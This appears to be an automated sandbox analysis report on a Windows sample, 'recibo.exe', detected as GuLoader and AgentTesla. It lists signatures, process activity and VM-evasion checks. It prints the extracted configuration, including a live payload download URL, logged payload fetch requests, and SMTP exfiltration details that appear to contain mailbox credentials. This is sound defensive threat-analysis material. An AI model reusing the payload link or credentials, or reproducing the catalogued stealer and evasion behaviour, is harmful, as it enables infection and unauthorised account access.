Windows Analysis Report
recibo.exe

Overview

General Information

Sample Name: recibo.exe
Analysis ID: 635097
MD5: 4680729edca682d1b6de8cf875bbfdf5
SHA1: debf5126050330ecbfc29582d979101cd557dd42
SHA256: e18032a74c8138c907ab2b6937ce66a4483a85e89b05a25153499efee4e85898

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • recibo.exe (PID: 4332 cmdline: "C:\Users\user\Desktop\recibo.exe" MD5: 4680729EDCA682D1B6DE8CF875BBFDF5)
    • CasPol.exe (PID: 416 cmdline: "C:\Users\user\Desktop\recibo.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • CasPol.exe (PID: 432 cmdline: "C:\Users\user\Desktop\recibo.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
{"Exfil Mode": "SMTP", "SMTP Info": "administracion@cortijocuevas.comAdm403mail.cortijocuevas.comchinastrapex@gmail.com"}
{"Payload URL": "https://drive.google.com/uc?export=download&id=1EX-TfU9P_N_SsQAtVtT8-t2zzMXng6WS"}
Source | Rule | Description | Author | Strings
00000004.00000000.23175826600.0000000000D00000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000004.00000002.28075201958.000000001D471000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000004.00000002.28075201958.000000001D471000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: CasPol.exe PID: 432 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
            No Sigma rule has matched
            No Snort rule has matched

            AV Detection

            Source: 00000004.00000000.23175826600.0000000000D00000.00000040.00000400.00020000.00000000.sdmp | Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1EX-TfU9P_N_SsQAtVtT8-t2zzMXng6WS"}
            Source: recibo.exe.4332.1.memstrmin | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "administracion@cortijocuevas.comAdm403mail.cortijocuevas.comchinastrapex@gmail.com"}
            Source: recibo.exe | Virustotal: Detection: 55%
            Source: recibo.exe | Metadefender: Detection: 25%
            Source: recibo.exe | ReversingLabs: Detection: 50%
            Source: recibo.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\recibo.exe | Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\dado
            Source: unknown | HTTPS traffic detected: 172.217.16.142:443 -> 192.168.11.20:49762 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 142.250.185.65:443 -> 192.168.11.20:49763 version: TLS 1.2
            Source: recibo.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: lgpllibs.pdb source: lgpllibs.dll.1.dr
            Source: Binary string: d:\build\ob\bora-18379147\bora-vmsoft\build\release-x64\svga\wddm\src\devapi\Win8Beta\x64\bin\vm3ddevapi64-debug.pdb source: vm3ddevapi64-debug.dll.1.dr
            Source: Binary string: C:\dev\UCDE\hallasan_gothamjarvis_4\ThirdParty\POG\HP.SmartApp.UCDE.Win32.Lib\HP.SmartApp.UCDE.Win32.Exe\obj\x64\Release\HPSUPD-Win32Exe.pdb source: HPSUPD-Win32Exe.exe.1.dr
            Source: C:\Users\user\Desktop\recibo.exe | Code function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405C49
            Source: C:\Users\user\Desktop\recibo.exe | Code function: 1_2_00406873 FindFirstFileW,FindClose,1_2_00406873
            Source: C:\Users\user\Desktop\recibo.exe | Code function: 1_2_0040290B FindFirstFileW,1_2_0040290B
            Source: C:\Users\user\Desktop\recibo.exe | File opened: C:\Users\user
            Source: C:\Users\user\Desktop\recibo.exe | File opened: C:\Users\user\AppData\Local\Temp\Rekorddage.Res7
            Source: C:\Users\user\Desktop\recibo.exe | File opened: C:\Users\user\AppData\Local
            Source: C:\Users\user\Desktop\recibo.exe | File opened: C:\Users\user\AppData\Local\Temp
            Source: C:\Users\user\Desktop\recibo.exe | File opened: C:\Users\user\AppData
            Source: C:\Users\user\Desktop\recibo.exe | File opened: C:\Users\user\AppData\Local\Temp\FLADBARMEDES.tub

            Networking

            Source: Malware configuration extractor | URLs: https://drive.google.com/uc?export=download&id=1EX-TfU9P_N_SsQAtVtT8-t2zzMXng6WS
            Source: Joe Sandbox View | ASN Name: HETZNER-ASDE HETZNER-ASDE
            Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1EX-TfU9P_N_SsQAtVtT8-t2zzMXng6WS HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/c6f1jlkill7f0g8rg2nidoteuikk5gii/1653650775000/00619175272154792338/*/1EX-TfU9P_N_SsQAtVtT8-t2zzMXng6WS?e=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-0g-cc-docs.googleusercontent.com Connection: Keep-Alive
            Source: global traffic | TCP traffic: 192.168.11.20:49764 -> 168.119.38.32:587
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49763
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknown | Network traffic detected: HTTP traffic on port 49762 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49763 -> 443
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | DNS traffic detected: queries for: drive.google.com
            Source: C:\Users\user\Desktop\recibo.exe | Code function: 1_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_004056DE
            Source: C:\Users\user\Desktop\recibo.exe | Code function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_0040352D
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB04A51_2_02CB04A5
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB08BB1_2_02CB08BB
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB08441_2_02CB0844
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB00591_2_02CB0059
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB04621_2_02CB0462
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB00011_2_02CB0001
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB08051_2_02CB0805
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB00151_2_02CB0015
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB042F1_2_02CB042F
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CBBC2D1_2_02CBBC2D
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB0C231_2_02CB0C23
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB71CF1_2_02CB71CF
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB0DC31_2_02CB0DC3
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB01D11_2_02CB01D1
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB0DF11_2_02CB0DF1
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB01961_2_02CB0196
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB09B71_2_02CB09B7
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB094F1_2_02CB094F
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB054D1_2_02CB054D
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB01541_2_02CB0154
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB816A1_2_02CB816A
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB057E1_2_02CB057E
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB0D7D1_2_02CB0D7D
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB010B1_2_02CB010B
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB0D101_2_02CB0D10
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB05141_2_02CB0514
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB0D3C1_2_02CB0D3C
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CBC9331_2_02CBC933
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB29311_2_02CB2931
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB81301_2_02CB8130
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB89351_2_02CB8935
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_1D3DA1604_2_1D3DA160
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_1D3D98904_2_1D3D9890
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_1D3D95484_2_1D3D9548
            Source: C:\Users\user\Desktop\recibo.exe Code function: 1_2_02CC42E9 LoadLibraryA,NtAllocateVirtualMemory, 1_2_02CC42E9
            Source: C:\Users\user\Desktop\recibo.exe Code function: 1_2_02CC67E9 NtMapViewOfSection, 1_2_02CC67E9
            Source: C:\Users\user\Desktop\recibo.exe Code function: 1_2_02CC61B4 NtProtectVirtualMemory, 1_2_02CC61B4
            Source: HPSUPD-Win32Exe.exe.1.dr Static PE information: No import functions for PE file found
            Source: recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamevm3ddevapi64-release.dll> vs recibo.exe
            Source: C:\Users\user\Desktop\recibo.exe Section loaded: edgegdi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: edgegdi.dll
            Source: recibo.exe Virustotal: Detection: 55%
            Source: recibo.exe Metadefender: Detection: 25%
            Source: recibo.exe ReversingLabs: Detection: 50%
            Source: C:\Users\user\Desktop\recibo.exe File read: C:\Users\user\Desktop\recibo.exe
            Source: recibo.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\recibo.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown Process created: C:\Users\user\Desktop\recibo.exe "C:\Users\user\Desktop\recibo.exe"
            Source: C:\Users\user\Desktop\recibo.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\recibo.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\recibo.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Users\user\Desktop\recibo.exe Code function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_0040352D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\recibo.exe File created: C:\Users\user\AppData\Local\Temp\nsa31B0.tmp
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/12@3/3
            Source: C:\Users\user\Desktop\recibo.exe Code function: 1_2_004021AA CoCreateInstance, 1_2_004021AA
            Source: C:\Users\user\Desktop\recibo.exe File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\recibo.exe Code function: 1_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 1_2_0040498A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:304:WilStaging_02
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Users\user\Desktop\recibo.exe Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\dado
            Source: recibo.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: lgpllibs.pdb source: lgpllibs.dll.1.dr
            Source: Binary string: d:\build\ob\bora-18379147\bora-vmsoft\build\release-x64\svga\wddm\src\devapi\Win8Beta\x64\bin\vm3ddevapi64-debug.pdb source: vm3ddevapi64-debug.dll.1.dr
            Source: Binary string: C:\dev\UCDE\hallasan_gothamjarvis_4\ThirdParty\POG\HP.SmartApp.UCDE.Win32.Lib\HP.SmartApp.UCDE.Win32.Exe\obj\x64\Release\HPSUPD-Win32Exe.pdb source: HPSUPD-Win32Exe.exe.1.dr

            Data Obfuscation

            Source: Yara match File source: 00000004.00000000.23175826600.0000000000D00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\recibo.exe Code function: 1_2_715430C0 push eax; ret 1_2_715430EE
            Source: C:\Users\user\Desktop\recibo.exe Code function: 1_2_02CB6640 push edx; retf 1_2_02CB665B
            Source: C:\Users\user\Desktop\recibo.exe Code function: 1_2_02CB98EE pushad ; iretd 1_2_02CB992C
            Source: C:\Users\user\Desktop\recibo.exe Code function: 1_2_02CB606C push ecx; retf A750h 1_2_02CB62CF
            Source: C:\Users\user\Desktop\recibo.exe Code function: 1_2_02CB65CB push edx; retf 1_2_02CB665B
            Source: C:\Users\user\Desktop\recibo.exe Code function: 1_2_02CB156B push ss; retf 1_2_02CB156D
            Source: C:\Users\user\Desktop\recibo.exe Code function: 1_2_02CB2931 push ds; retf 0FEBh 1_2_02CB2B36
            Source: vm3ddevapi64-debug.dll.1.dr Static PE information: section name: .didat
            Source: vm3ddevapi64-debug.dll.1.dr Static PE information: section name: .gehcont
            Source: vm3ddevapi64-debug.dll.1.dr Static PE information: section name: _RDATA
            Source: lgpllibs.dll.1.dr Static PE information: section name: .00cfg
            Source: C:\Users\user\Desktop\recibo.exe Code function: 1_2_71541BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 1_2_71541BFF
            Source: HPSUPD-Win32Exe.exe.1.dr Static PE information: 0x8CC4634B [Wed Nov 2 06:25:15 2044 UTC]
            Source: C:\Users\user\Desktop\recibo.exe File created: C:\Users\user\AppData\Local\Temp\lgpllibs.dll
            Source: C:\Users\user\Desktop\recibo.exe File created: C:\Users\user\AppData\Local\Temp\vm3ddevapi64-debug.dll
            Source: C:\Users\user\Desktop\recibo.exe File created: C:\Users\user\AppData\Local\Temp\HPSUPD-Win32Exe.exe
            Source: C:\Users\user\Desktop\recibo.exe File created: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll
            Source: C:\Users\user\Desktop\recibo.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\recibo.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\recibo.exe File opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\qga\qga.exe
            Source: recibo.exe, 00000001.00000002.23385987124.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: recibo.exe, 00000001.00000002.23385987124.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2632 Thread sleep time: -4611686018427385s >= -30000s
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\recibo.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lgpllibs.dll
            Source: C:\Users\user\Desktop\recibo.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vm3ddevapi64-debug.dll
            Source: C:\Users\user\Desktop\recibo.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\HPSUPD-Win32Exe.exe
            Source: C:\Users\user\Desktop\recibo.exe Code function: 1_2_02CB12C7 rdtsc 1_2_02CB12C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 9599
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\recibo.exe Code function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 1_2_00405C49
            Source: C:\Users\user\Desktop\recibo.exe Code function: 1_2_00406873 FindFirstFileW,FindClose, 1_2_00406873
            Source: C:\Users\user\Desktop\recibo.exe Code function: 1_2_0040290B FindFirstFileW, 1_2_0040290B
            Source: C:\Users\user\Desktop\recibo.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\Desktop\recibo.exeAPI call chain: ExitProcess graph end nodegraph_1-19925
            Source: C:\Users\user\Desktop\recibo.exeAPI call chain: ExitProcess graph end nodegraph_1-20079
            Source: C:\Users\user\Desktop\recibo.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\recibo.exeFile opened: C:\Users\user\AppData\Local\Temp\Rekorddage.Res7Jump to behavior
            Source: C:\Users\user\Desktop\recibo.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Users\user\Desktop\recibo.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Users\user\Desktop\recibo.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\recibo.exeFile opened: C:\Users\user\AppData\Local\Temp\FLADBARMEDES.tubJump to behavior
            Source: vm3ddevapi64-debug.dll.1.drBinary or memory string: CompanyNameVMware, Inc.j!
            Source: CasPol.exe, 00000004.00000002.28051387241.0000000000FF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
            Source: vm3ddevapi64-debug.dll.1.drBinary or memory string: http://www.vmware.com/0
            Source: recibo.exe, 00000001.00000002.23386279230.0000000004749000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28053311959.0000000002C99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: vm3ddevapi64-debug.dll.1.drBinary or memory string: VMware, Inc.
            Source: recibo.exe, 00000001.00000002.23386279230.0000000004749000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28053311959.0000000002C99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: vm3ddevapi64-debug.dll.1.drBinary or memory string: VMware, Inc.1!0
            Source: recibo.exe, 00000001.00000002.23385987124.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
            Source: recibo.exe, 00000001.00000002.23386279230.0000000004749000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28053311959.0000000002C99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
            Source: vm3ddevapi64-debug.dll.1.dr Binary or memory string: http://www.vmware.com/0/
            Source: CasPol.exe, 00000004.00000002.28051958179.000000000105A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
            Source: vm3ddevapi64-debug.dll.1.dr Binary or memory string: VMware, Inc.1
            Source: vm3ddevapi64-debug.dll.1.dr Binary or memory string: VMware, Inc.0
            Source: vm3ddevapi64-debug.dll.1.dr Binary or memory string: ProductNameVMware SVGA 3D`
            Source: recibo.exe, 00000001.00000002.23385987124.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: recibo.exe, 00000001.00000002.23386279230.0000000004749000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28053311959.0000000002C99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
            Source: vm3ddevapi64-debug.dll.1.dr Binary or memory string: LegalCopyrightCopyright (C) 1998-2021 VMware, Inc.Z
            Source: recibo.exe, 00000001.00000002.23386279230.0000000004749000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28053311959.0000000002C99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
            Source: vm3ddevapi64-debug.dll.1.dr Binary or memory string: noreply@vmware.com0
            Source: vm3ddevapi64-debug.dll.1.dr Binary or memory string: FileDescriptionVMware SVGA 3D Device API Module:
            Source: CasPol.exe, 00000004.00000002.28053311959.0000000002C99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
            Source: recibo.exe, 00000001.00000002.23386279230.0000000004749000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28053311959.0000000002C99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
